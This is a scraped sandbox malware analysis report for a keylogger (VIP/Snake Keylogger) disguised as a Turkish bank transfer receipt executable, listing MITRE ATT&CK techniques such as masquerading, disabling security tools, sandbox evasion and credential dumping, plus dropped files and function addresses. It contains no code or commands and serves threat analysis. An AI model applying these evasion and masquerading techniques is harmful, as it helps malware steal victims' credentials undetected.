Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2x43t2cl.nbs.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsk4qyqp.soh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_futqoqw2.dyy.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r0mf4ill.b2t.psm1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Function 00F7D6B0 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Function 00F7D6C0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 06FB0EB8 Relevance: 3.3, Instructions: 3309
COMMON

Function 06FB8E68 Relevance: 2.7, Strings: 2, Instructions: 157
COMMON

Function 06FB8E78 Relevance: 2.7, Strings: 2, Instructions: 153
COMMON

Function 088B7B25 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Function 088B7B30 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 00F7B417 Relevance: 1.7, APIs: 1, Instructions: 203
COMMON

Function 00F7590D Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Function 00F744B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 088B74A0 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Function 088B74A8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre